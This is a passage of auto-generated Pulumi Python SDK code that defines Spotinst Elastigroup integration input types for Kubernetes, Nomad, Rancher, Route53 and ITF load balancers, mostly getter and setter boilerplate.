@pulumi.getter(name="autoscaleLabels")
def autoscale_labels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleLabelArgs']]]]:
"""
A key/value mapping of tags to assign to the resource.
"""
return pulumi.get(self, "autoscale_labels")
@autoscale_labels.setter
def autoscale_labels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleLabelArgs']]]]):
pulumi.set(self, "autoscale_labels", value)
@property
@pulumi.getter(name="clusterIdentifier")
def cluster_identifier(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "cluster_identifier")
@cluster_identifier.setter
def cluster_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_identifier", value)
@property
@pulumi.getter(name="integrationMode")
def integration_mode(self) -> Optional[pulumi.Input[str]]:
"""
Valid values: `"saas"`, `"pod"`.
"""
return pulumi.get(self, "integration_mode")
@integration_mode.setter
def integration_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "integration_mode", value)
@property
@pulumi.getter
def token(self) -> Optional[pulumi.Input[str]]:
"""
Kubernetes Token
"""
return pulumi.get(self, "token")
@token.setter
def token(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "token", value)
@pulumi.input_type
class ElastigroupIntegrationKubernetesAutoscaleDownArgs:
def __init__(__self__, *,
evaluation_periods: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
"""
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
How many evaluation periods should accumulate before a scale down action takes place.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@pulumi.input_type
class ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs:
def __init__(__self__, *,
cpu_per_unit: Optional[pulumi.Input[int]] = None,
memory_per_unit: Optional[pulumi.Input[int]] = None,
num_of_units: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] cpu_per_unit: How much CPU (MHz) to allocate for headroom unit.
:param pulumi.Input[int] memory_per_unit: How much Memory allocate for headroom unit.
:param pulumi.Input[int] num_of_units: How many units of headroom to allocate.
"""
if cpu_per_unit is not None:
pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
if memory_per_unit is not None:
pulumi.set(__self__, "memory_per_unit", memory_per_unit)
if num_of_units is not None:
pulumi.set(__self__, "num_of_units", num_of_units)
@property
@pulumi.getter(name="cpuPerUnit")
def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
How much CPU (MHz) to allocate for headroom unit.
"""
return pulumi.get(self, "cpu_per_unit")
@cpu_per_unit.setter
def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_per_unit", value)
@property
@pulumi.getter(name="memoryPerUnit")
def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
How much Memory allocate for headroom unit.
"""
return pulumi.get(self, "memory_per_unit")
@memory_per_unit.setter
def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "memory_per_unit", value)
@property
@pulumi.getter(name="numOfUnits")
def num_of_units(self) -> Optional[pulumi.Input[int]]:
"""
How many units of headroom to allocate.
"""
return pulumi.get(self, "num_of_units")
@num_of_units.setter
def num_of_units(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class ElastigroupIntegrationKubernetesAutoscaleLabelArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
value: pulumi.Input[str]):
"""
:param pulumi.Input[str] value: The dimension value.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The dimension value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupIntegrationMesosphereArgs:
def __init__(__self__, *,
api_server: pulumi.Input[str]):
"""
:param pulumi.Input[str] api_server: The public IP of the DC/OS Master.
"""
pulumi.set(__self__, "api_server", api_server)
@property
@pulumi.getter(name="apiServer")
def api_server(self) -> pulumi.Input[str]:
"""
The public IP of the DC/OS Master.
"""
return pulumi.get(self, "api_server")
@api_server.setter
def api_server(self, value: pulumi.Input[str]):
pulumi.set(self, "api_server", value)
@pulumi.input_type
class ElastigroupIntegrationMultaiRuntimeArgs:
def __init__(__self__, *,
deployment_id: pulumi.Input[str]):
"""
:param pulumi.Input[str] deployment_id: The deployment id you want to get
"""
pulumi.set(__self__, "deployment_id", deployment_id)
@property
@pulumi.getter(name="deploymentId")
def deployment_id(self) -> pulumi.Input[str]:
"""
The deployment id you want to get
"""
return pulumi.get(self, "deployment_id")
@deployment_id.setter
def deployment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "deployment_id", value)
@pulumi.input_type
class ElastigroupIntegrationNomadArgs:
def __init__(__self__, *,
master_host: pulumi.Input[str],
master_port: pulumi.Input[int],
acl_token: Optional[pulumi.Input[str]] = None,
autoscale_constraints: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationNomadAutoscaleConstraintArgs']]]] = None,
autoscale_cooldown: Optional[pulumi.Input[int]] = None,
autoscale_down: Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleDownArgs']] = None,
autoscale_headroom: Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleHeadroomArgs']] = None,
autoscale_is_enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] master_host: The URL for the Nomad master host.
:param pulumi.Input[int] master_port: The network port for the master host.
:param pulumi.Input[str] acl_token: Nomad ACL Token
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationNomadAutoscaleConstraintArgs']]] autoscale_constraints: A key/value mapping of tags to assign to the resource.
:param pulumi.Input[int] autoscale_cooldown: The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
:param pulumi.Input['ElastigroupIntegrationNomadAutoscaleDownArgs'] autoscale_down: Settings for scale down actions.
:param pulumi.Input['ElastigroupIntegrationNomadAutoscaleHeadroomArgs'] autoscale_headroom: An option to set compute reserve for the cluster.
:param pulumi.Input[bool] autoscale_is_enabled: Specifies whether the auto scaling feature is enabled.
"""
pulumi.set(__self__, "master_host", master_host)
pulumi.set(__self__, "master_port", master_port)
if acl_token is not None:
pulumi.set(__self__, "acl_token", acl_token)
if autoscale_constraints is not None:
pulumi.set(__self__, "autoscale_constraints", autoscale_constraints)
if autoscale_cooldown is not None:
pulumi.set(__self__, "autoscale_cooldown", autoscale_cooldown)
if autoscale_down is not None:
pulumi.set(__self__, "autoscale_down", autoscale_down)
if autoscale_headroom is not None:
pulumi.set(__self__, "autoscale_headroom", autoscale_headroom)
if autoscale_is_enabled is not None:
pulumi.set(__self__, "autoscale_is_enabled", autoscale_is_enabled)
@property
@pulumi.getter(name="masterHost")
def master_host(self) -> pulumi.Input[str]:
"""
The URL for the Nomad master host.
"""
return pulumi.get(self, "master_host")
@master_host.setter
def master_host(self, value: pulumi.Input[str]):
pulumi.set(self, "master_host", value)
@property
@pulumi.getter(name="masterPort")
def master_port(self) -> pulumi.Input[int]:
"""
The network port for the master host.
"""
return pulumi.get(self, "master_port")
@master_port.setter
def master_port(self, value: pulumi.Input[int]):
pulumi.set(self, "master_port", value)
@property
@pulumi.getter(name="aclToken")
def acl_token(self) -> Optional[pulumi.Input[str]]:
"""
Nomad ACL Token
"""
return pulumi.get(self, "acl_token")
@acl_token.setter
def acl_token(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "acl_token", value)
@property
@pulumi.getter(name="autoscaleConstraints")
def autoscale_constraints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationNomadAutoscaleConstraintArgs']]]]:
"""
A key/value mapping of tags to assign to the resource.
"""
return pulumi.get(self, "autoscale_constraints")
@autoscale_constraints.setter
def autoscale_constraints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationNomadAutoscaleConstraintArgs']]]]):
pulumi.set(self, "autoscale_constraints", value)
@property
@pulumi.getter(name="autoscaleCooldown")
def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
"""
return pulumi.get(self, "autoscale_cooldown")
@autoscale_cooldown.setter
def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "autoscale_cooldown", value)
@property
@pulumi.getter(name="autoscaleDown")
def autoscale_down(self) -> Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleDownArgs']]:
"""
Settings for scale down actions.
"""
return pulumi.get(self, "autoscale_down")
@autoscale_down.setter
def autoscale_down(self, value: Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleDownArgs']]):
pulumi.set(self, "autoscale_down", value)
@property
@pulumi.getter(name="autoscaleHeadroom")
def autoscale_headroom(self) -> Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleHeadroomArgs']]:
"""
An option to set compute reserve for the cluster.
"""
return pulumi.get(self, "autoscale_headroom")
@autoscale_headroom.setter
def autoscale_headroom(self, value: Optional[pulumi.Input['ElastigroupIntegrationNomadAutoscaleHeadroomArgs']]):
pulumi.set(self, "autoscale_headroom", value)
@property
@pulumi.getter(name="autoscaleIsEnabled")
def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the auto scaling feature is enabled.
"""
return pulumi.get(self, "autoscale_is_enabled")
@autoscale_is_enabled.setter
def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "autoscale_is_enabled", value)
@pulumi.input_type
class ElastigroupIntegrationNomadAutoscaleConstraintArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
value: pulumi.Input[str]):
"""
:param pulumi.Input[str] value: The dimension value.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def value(self) -> pulumi.Input[str]:
"""
The dimension value.
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: pulumi.Input[str]):
pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupIntegrationNomadAutoscaleDownArgs:
def __init__(__self__, *,
evaluation_periods: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
"""
if evaluation_periods is not None:
pulumi.set(__self__, "evaluation_periods", evaluation_periods)
@property
@pulumi.getter(name="evaluationPeriods")
def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
"""
How many evaluation periods should accumulate before a scale down action takes place.
"""
return pulumi.get(self, "evaluation_periods")
@evaluation_periods.setter
def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "evaluation_periods", value)
@pulumi.input_type
class ElastigroupIntegrationNomadAutoscaleHeadroomArgs:
def __init__(__self__, *,
cpu_per_unit: Optional[pulumi.Input[int]] = None,
memory_per_unit: Optional[pulumi.Input[int]] = None,
num_of_units: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] cpu_per_unit: How much CPU (MHz) to allocate for headroom unit.
:param pulumi.Input[int] memory_per_unit: How much Memory allocate for headroom unit.
:param pulumi.Input[int] num_of_units: How many units of headroom to allocate.
"""
if cpu_per_unit is not None:
pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
if memory_per_unit is not None:
pulumi.set(__self__, "memory_per_unit", memory_per_unit)
if num_of_units is not None:
pulumi.set(__self__, "num_of_units", num_of_units)
@property
@pulumi.getter(name="cpuPerUnit")
def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
How much CPU (MHz) to allocate for headroom unit.
"""
return pulumi.get(self, "cpu_per_unit")
@cpu_per_unit.setter
def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cpu_per_unit", value)
@property
@pulumi.getter(name="memoryPerUnit")
def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
"""
How much Memory allocate for headroom unit.
"""
return pulumi.get(self, "memory_per_unit")
@memory_per_unit.setter
def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "memory_per_unit", value)
@property
@pulumi.getter(name="numOfUnits")
def num_of_units(self) -> Optional[pulumi.Input[int]]:
"""
How many units of headroom to allocate.
"""
return pulumi.get(self, "num_of_units")
@num_of_units.setter
def num_of_units(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class ElastigroupIntegrationRancherArgs:
def __init__(__self__, *,
access_key: pulumi.Input[str],
master_host: pulumi.Input[str],
secret_key: pulumi.Input[str],
version: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] access_key: The access key of the Rancher API.
:param pulumi.Input[str] master_host: The URL for the Nomad master host.
:param pulumi.Input[str] secret_key: The secret key of the Rancher API.
:param pulumi.Input[str] version: The Rancher version. Must be `"1"` or `"2"`. If this field is omitted, it’s assumed that the Rancher cluster is version 1. Note that Kubernetes is required when using Rancher version 2^.
Usage:
"""
pulumi.set(__self__, "access_key", access_key)
pulumi.set(__self__, "master_host", master_host)
pulumi.set(__self__, "secret_key", secret_key)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="accessKey")
def access_key(self) -> pulumi.Input[str]:
"""
The access key of the Rancher API.
"""
return pulumi.get(self, "access_key")
@access_key.setter
def access_key(self, value: pulumi.Input[str]):
pulumi.set(self, "access_key", value)
@property
@pulumi.getter(name="masterHost")
def master_host(self) -> pulumi.Input[str]:
"""
The URL for the Nomad master host.
"""
return pulumi.get(self, "master_host")
@master_host.setter
def master_host(self, value: pulumi.Input[str]):
pulumi.set(self, "master_host", value)
@property
@pulumi.getter(name="secretKey")
def secret_key(self) -> pulumi.Input[str]:
"""
The secret key of the Rancher API.
"""
return pulumi.get(self, "secret_key")
@secret_key.setter
def secret_key(self, value: pulumi.Input[str]):
pulumi.set(self, "secret_key", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[str]]:
"""
The Rancher version. Must be `"1"` or `"2"`. If this field is omitted, it’s assumed that the Rancher cluster is version 1. Note that Kubernetes is required when using Rancher version 2^.
Usage:
"""
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version", value)
@pulumi.input_type
class ElastigroupIntegrationRoute53Args:
def __init__(__self__, *,
domains: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainArgs']]]):
"""
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainArgs']]] domains: Collection of one or more domains to register.
"""
pulumi.set(__self__, "domains", domains)
@property
@pulumi.getter
def domains(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainArgs']]]:
"""
Collection of one or more domains to register.
"""
return pulumi.get(self, "domains")
@domains.setter
def domains(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainArgs']]]):
pulumi.set(self, "domains", value)
@pulumi.input_type
class ElastigroupIntegrationRoute53DomainArgs:
def __init__(__self__, *,
hosted_zone_id: pulumi.Input[str],
record_sets: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainRecordSetArgs']]],
record_set_type: Optional[pulumi.Input[str]] = None,
spotinst_acct_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] hosted_zone_id: The id associated with a hosted zone.
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainRecordSetArgs']]] record_sets: Collection of records containing authoritative DNS information for the specified domain name.
:param pulumi.Input[str] record_set_type: The type of the record set. Valid values: `"a"`, `"cname"`.
:param pulumi.Input[str] spotinst_acct_id: The Spotinst account ID that is linked to the AWS account that holds the Route 53 Hosted Zone ID. The default is the user Spotinst account provided as a URL parameter.
"""
pulumi.set(__self__, "hosted_zone_id", hosted_zone_id)
pulumi.set(__self__, "record_sets", record_sets)
if record_set_type is not None:
pulumi.set(__self__, "record_set_type", record_set_type)
if spotinst_acct_id is not None:
pulumi.set(__self__, "spotinst_acct_id", spotinst_acct_id)
@property
@pulumi.getter(name="hostedZoneId")
def hosted_zone_id(self) -> pulumi.Input[str]:
"""
The id associated with a hosted zone.
"""
return pulumi.get(self, "hosted_zone_id")
@hosted_zone_id.setter
def hosted_zone_id(self, value: pulumi.Input[str]):
pulumi.set(self, "hosted_zone_id", value)
@property
@pulumi.getter(name="recordSets")
def record_sets(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainRecordSetArgs']]]:
"""
Collection of records containing authoritative DNS information for the specified domain name.
"""
return pulumi.get(self, "record_sets")
@record_sets.setter
def record_sets(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationRoute53DomainRecordSetArgs']]]):
pulumi.set(self, "record_sets", value)
@property
@pulumi.getter(name="recordSetType")
def record_set_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the record set. Valid values: `"a"`, `"cname"`.
"""
return pulumi.get(self, "record_set_type")
@record_set_type.setter
def record_set_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "record_set_type", value)
@property
@pulumi.getter(name="spotinstAcctId")
def spotinst_acct_id(self) -> Optional[pulumi.Input[str]]:
"""
The Spotinst account ID that is linked to the AWS account that holds the Route 53 Hosted Zone ID. The default is the user Spotinst account provided as a URL parameter.
"""
return pulumi.get(self, "spotinst_acct_id")
@spotinst_acct_id.setter
def spotinst_acct_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "spotinst_acct_id", value)
@pulumi.input_type
class ElastigroupIntegrationRoute53DomainRecordSetArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
use_public_dns: Optional[pulumi.Input[bool]] = None,
use_public_ip: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] name: The record set name.
:param pulumi.Input[bool] use_public_dns: - Designates whether the DNS address should be exposed to connections outside the VPC.
:param pulumi.Input[bool] use_public_ip: - Designates whether the IP address should be exposed to connections outside the VPC.
"""
pulumi.set(__self__, "name", name)
if use_public_dns is not None:
pulumi.set(__self__, "use_public_dns", use_public_dns)
if use_public_ip is not None:
pulumi.set(__self__, "use_public_ip", use_public_ip)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The record set name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="usePublicDns")
def use_public_dns(self) -> Optional[pulumi.Input[bool]]:
"""
- Designates whether the DNS address should be exposed to connections outside the VPC.
"""
return pulumi.get(self, "use_public_dns")
@use_public_dns.setter
def use_public_dns(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_public_dns", value)
@property
@pulumi.getter(name="usePublicIp")
def use_public_ip(self) -> Optional[pulumi.Input[bool]]:
"""
- Designates whether the IP address should be exposed to connections outside the VPC.
"""
return pulumi.get(self, "use_public_ip")
@use_public_ip.setter
def use_public_ip(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_public_ip", value)
@pulumi.input_type
class ElastigroupItfArgs:
def __init__(__self__, *,
fixed_target_groups: pulumi.Input[bool],
load_balancers: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerArgs']]],
target_group_configs: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigArgs']]],
weight_strategy: pulumi.Input[str],
migration_healthiness_threshold: Optional[pulumi.Input[int]] = None):
pulumi.set(__self__, "fixed_target_groups", fixed_target_groups)
pulumi.set(__self__, "load_balancers", load_balancers)
pulumi.set(__self__, "target_group_configs", target_group_configs)
pulumi.set(__self__, "weight_strategy", weight_strategy)
if migration_healthiness_threshold is not None:
pulumi.set(__self__, "migration_healthiness_threshold", migration_healthiness_threshold)
@property
@pulumi.getter(name="fixedTargetGroups")
def fixed_target_groups(self) -> pulumi.Input[bool]:
return pulumi.get(self, "fixed_target_groups")
@fixed_target_groups.setter
def fixed_target_groups(self, value: pulumi.Input[bool]):
pulumi.set(self, "fixed_target_groups", value)
@property
@pulumi.getter(name="loadBalancers")
def load_balancers(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerArgs']]]:
return pulumi.get(self, "load_balancers")
@load_balancers.setter
def load_balancers(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerArgs']]]):
pulumi.set(self, "load_balancers", value)
@property
@pulumi.getter(name="targetGroupConfigs")
def target_group_configs(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigArgs']]]:
return pulumi.get(self, "target_group_configs")
@target_group_configs.setter
def target_group_configs(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigArgs']]]):
pulumi.set(self, "target_group_configs", value)
@property
@pulumi.getter(name="weightStrategy")
def weight_strategy(self) -> pulumi.Input[str]:
return pulumi.get(self, "weight_strategy")
@weight_strategy.setter
def weight_strategy(self, value: pulumi.Input[str]):
pulumi.set(self, "weight_strategy", value)
@property
@pulumi.getter(name="migrationHealthinessThreshold")
def migration_healthiness_threshold(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "migration_healthiness_threshold")
@migration_healthiness_threshold.setter
def migration_healthiness_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "migration_healthiness_threshold", value)
@pulumi.input_type
class ElastigroupItfLoadBalancerArgs:
def __init__(__self__, *,
listener_rules: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerListenerRuleArgs']]],
load_balancer_arn: pulumi.Input[str]):
pulumi.set(__self__, "listener_rules", listener_rules)
pulumi.set(__self__, "load_balancer_arn", load_balancer_arn)
@property
@pulumi.getter(name="listenerRules")
def listener_rules(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerListenerRuleArgs']]]:
return pulumi.get(self, "listener_rules")
@listener_rules.setter
def listener_rules(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupItfLoadBalancerListenerRuleArgs']]]):
pulumi.set(self, "listener_rules", value)
@property
@pulumi.getter(name="loadBalancerArn")
def load_balancer_arn(self) -> pulumi.Input[str]:
return pulumi.get(self, "load_balancer_arn")
@load_balancer_arn.setter
def load_balancer_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "load_balancer_arn", value)
@pulumi.input_type
class ElastigroupItfLoadBalancerListenerRuleArgs:
def __init__(__self__, *,
rule_arn: pulumi.Input[str]):
pulumi.set(__self__, "rule_arn", rule_arn)
@property
@pulumi.getter(name="ruleArn")
def rule_arn(self) -> pulumi.Input[str]:
return pulumi.get(self, "rule_arn")
@rule_arn.setter
def rule_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "rule_arn", value)
@pulumi.input_type
class ElastigroupItfTargetGroupConfigArgs:
def __init__(__self__, *,
health_check_path: pulumi.Input[str],
port: pulumi.Input[int],
protocol: pulumi.Input[str],
vpc_id: pulumi.Input[str],
health_check_interval_seconds: Optional[pulumi.Input[int]] = None,
health_check_port: Optional[pulumi.Input[str]] = None,
health_check_protocol: Optional[pulumi.Input[str]] = None,
health_check_timeout_seconds: Optional[pulumi.Input[int]] = None,
healthy_threshold_count: Optional[pulumi.Input[int]] = None,
matchers: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigMatcherArgs']]]] = None,
protocol_version: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigTagArgs']]]] = None,
unhealthy_threshold_count: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigTagArgs']]] tags: A key/value mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "health_check_path", health_check_path)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "protocol", protocol)
pulumi.set(__self__, "vpc_id", vpc_id)
if health_check_interval_seconds is not None:
pulumi.set(__self__, "health_check_interval_seconds", health_check_interval_seconds)
if health_check_port is not None:
pulumi.set(__self__, "health_check_port", health_check_port)
if health_check_protocol is not None:
pulumi.set(__self__, "health_check_protocol", health_check_protocol)
if health_check_timeout_seconds is not None:
pulumi.set(__self__, "health_check_timeout_seconds", health_check_timeout_seconds)
if healthy_threshold_count is not None:
pulumi.set(__self__, "healthy_threshold_count", healthy_threshold_count)
if matchers is not None:
pulumi.set(__self__, "matchers", matchers)
if protocol_version is not None:
pulumi.set(__self__, "protocol_version", protocol_version)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if unhealthy_threshold_count is not None:
pulumi.set(__self__, "unhealthy_threshold_count", unhealthy_threshold_count)
@property
@pulumi.getter(name="healthCheckPath")
def health_check_path(self) -> pulumi.Input[str]:
return pulumi.get(self, "health_check_path")
@health_check_path.setter
def health_check_path(self, value: pulumi.Input[str]):
pulumi.set(self, "health_check_path", value)
@property
@pulumi.getter
def port(self) -> pulumi.Input[int]:
return pulumi.get(self, "port")
@port.setter
def port(self, value: pulumi.Input[int]):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def protocol(self) -> pulumi.Input[str]:
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: pulumi.Input[str]):
pulumi.set(self, "protocol", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vpc_id", value)
@property
@pulumi.getter(name="healthCheckIntervalSeconds")
def health_check_interval_seconds(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "health_check_interval_seconds")
@health_check_interval_seconds.setter
def health_check_interval_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "health_check_interval_seconds", value)
@property
@pulumi.getter(name="healthCheckPort")
def health_check_port(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "health_check_port")
@health_check_port.setter
def health_check_port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health_check_port", value)
@property
@pulumi.getter(name="healthCheckProtocol")
def health_check_protocol(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "health_check_protocol")
@health_check_protocol.setter
def health_check_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health_check_protocol", value)
@property
@pulumi.getter(name="healthCheckTimeoutSeconds")
def health_check_timeout_seconds(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "health_check_timeout_seconds")
@health_check_timeout_seconds.setter
def health_check_timeout_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "health_check_timeout_seconds", value)
@property
@pulumi.getter(name="healthyThresholdCount")
def healthy_threshold_count(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "healthy_threshold_count")
@healthy_threshold_count.setter
def healthy_threshold_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "healthy_threshold_count", value)
@property
@pulumi.getter
def matchers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigMatcherArgs']]]]:
return pulumi.get(self, "matchers")
@matchers.setter
def matchers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigMatcherArgs']]]]):
pulumi.set(self, "matchers", value)
@property
@pulumi.getter(name="protocolVersion")
def protocol_version(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "protocol_version")
@protocol_version.setter
def protocol_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol_version", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigTagArgs']]]]:
"""
A key/value mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupItfTargetGroupConfigTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="unhealthyThresholdCount")
def unhealthy_threshold_count(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "unhealthy_threshold_count")
@unhealthy_threshold_count.setter
def unhealthy_threshold_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "unhealthy_threshold_count", value)
@pulumi.input_type
class ElastigroupItfTargetGroupConfigMatcherArgs:
def __init__(__self__, *,
grpc_code: Optional[pulumi.Input[str]] = None,
http_code: Optional[pulumi.Input[str]] = None):
if grpc_code is not None:
pulumi.set(__self__, "grpc_code", grpc_code)
if http_code is not None:
pulumi.set(__self__, "http_code", http_code)
@property
@pulumi.getter(name="grpcCode")
def grpc_code(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "grpc_code")
@grpc_code.setter
def grpc_code(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "grpc_code", value)
@property
@pulumi.getter(name="httpCode")
def http_code(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "http_code")
@http_code.setter
def http_code(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "http_code", value)
@pulumi.input_type
class ElastigroupItfTargetGroupConfigTagArgs:
